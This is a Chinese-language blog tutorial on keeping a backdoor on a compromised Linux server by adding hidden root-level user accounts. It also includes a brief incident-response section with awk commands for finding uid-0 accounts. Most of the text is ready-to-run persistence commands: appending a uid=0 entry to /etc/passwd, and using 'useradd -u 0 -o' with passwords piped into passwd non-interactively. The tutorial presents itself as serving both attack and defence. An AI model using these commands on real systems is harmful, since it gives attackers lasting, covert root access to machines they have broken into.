LINUX留后门--教程(一)—— 增加超级用户帐号

828 阅读2分钟

一、本教程作用

1、用在攻击的途径上
2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急?
不知攻,焉知防

二、增加超级用户帐号-教程

前提条件:  假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限
环境:  一台开启ssh的任意Linux服务器就可以(我用的虚拟机)

2.1 第一种情况:可以交互且允许uid=0的用户远程登录

增加超级用户账号命令:

echo "cshm:x:0:0::/:/bin/sh" >> /etc/passwd #增加超级用户账号
passwd cshm #修改cshm的密码为cshm123

image.png ssh链接账户cshm:

image.png 输入账号:cshm 密码:cshm123 ,成功留下该账户后门,并且是root权限

image.png

2.2 第二种情况:可以交互且不允许uid=0的用户远程登录

如果系统不允许 uid=0 的用户远程登录(因为root的uid=0),可以增加一个普通用户账号 设置不允许root账户远程登录,参考链接:www.cnblogs.com/binblogs/p/…

命令:

增加超级用户账号命令:

echo "wxg:x:1000:1000::/:/bin/sh" >> /etc/passwd  #增加普通用户账号
passwd wxg  #修改wxg的密码为wxg147258369

之后xhell远程登录wxg测试,成功,但是root账户,及时输入正确的密码也是不能成功登录的

image.png

2.3 第三种情况:不交互无回显添加Linux密码

第一种:

useradd wxg -u 0 -o -g root -G root|| echo "123456" | passwd --stdin wxg #创建账户wxg、密码123456且为root权限
useradd wxg -u 0 -o -g root -G root|| echo "123456" | passwd --stdin wxg #创建账户wxg、密码123456且为root权限

得执行命令两次才可以

image.png

image.png wxg的权限查看为root权限

image.png

image.png 第二种:

useradd  test
echo "123456" | passwd --stdin test

image.png 权限较小

image.png 第三种:

useradd -u 0 -o -g root -G root user |echo -e "1qazwsx2wsx\n1qazwsx2wsx"|passwd user

也是得执行两次,并且对密码强度有要求

image.png user的权限查看为root权限

image.png

三、增加超级用户帐号——应急响应发现

Linux下查看可以远程登录的账号信息:

awk '/\$1|\$6/{print $1}' /etc/shadow

image.png 查看特权账户,那些账户有root权限

awk -F: '$3==0 {print$1}' /etc/passwd

image.png 之后与服务器管理员沟通,就可以确定黑客增加的用户账号了。

更多资源:
1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥\

image.png